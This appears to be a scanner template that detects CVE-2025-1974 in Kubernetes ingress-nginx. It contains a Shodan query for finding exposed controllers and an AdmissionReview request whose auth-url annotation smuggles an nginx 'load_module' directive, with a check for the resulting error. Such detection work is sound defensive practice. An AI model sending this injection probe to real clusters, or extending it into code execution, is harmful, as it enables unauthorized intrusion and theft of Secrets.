id: CVE-2025-1974
info:
name: CVE-2025-1974
author: 左轮改AK
severity: high
verified: true
description: |
shodan-query: ssl:"ingress-nginx" port:8443
Kubernetes ingress-nginx是云原生计算基金会(Cloud Native Computing Foundation)开源的Kubernetes 的入口控制器,使用NGINX作为反向代理和负载均衡器。Kubernetes ingress-nginx存在安全漏洞,该漏洞源于在某些条件下,未认证的攻击者可通过访问pod网络在ingress-nginx控制器环境中执行任意代码,可能导致Secrets泄露。
rules:
r0:
request:
method: POST
path: /
header:
Content-Type: application/json
body: |
{"kind":"AdmissionReview","apiVersion":"admission.k8s.io/v1","request":{"uid":"d48aa397-c414-4fb2-a2b0-b28187daf8a6","kind":{"group":"networking.k8s.io","version":"v1","kind":"Ingress"},"resource":{"group":"networking.k8s.io","version":"v1","resource":"ingresses"},"requestKind":{"group":"networking.k8s.io","version":"v1","kind":"Ingress"},"requestResource":{"group":"networking.k8s.io","version":"v1","resource":"ingresses"},"name":"test-ee05c512-4ea7-418b-b4aa-9fc5a10874ee","namespace":"default","operation":"CREATE","userInfo":{},"object":{"kind":"Ingress","apiVersion":"networking.k8s.io/v1","metadata":{"name":"test-ee05c512-4ea7-418b-b4aa-9fc5a10874ee","namespace":"default","creationTimestamp":null,"annotations":{"nginx.ingress.kubernetes.io/auth-url":"http://example.com#;load_module test;\n"}},"spec":{"ingressClassName":"nginx","rules":[{"host":"ee05c512-4ea7-418b-b4aa-9fc5a10874ee","http":{"paths":[]}}]},"status":{"loadBalancer":{}}},"oldObject":null,"dryRun":true,"options":{"kind":"CreateOptions","apiVersion":"meta.k8s.io/v1"}}}
expression: |
response.status == 200 &&
response.body.bcontains(b'AdmissionReview') &&
!response.body.bcontains(b'load_module')&&
response.body.bcontains(b'directive is not allowed here')
expression: r0()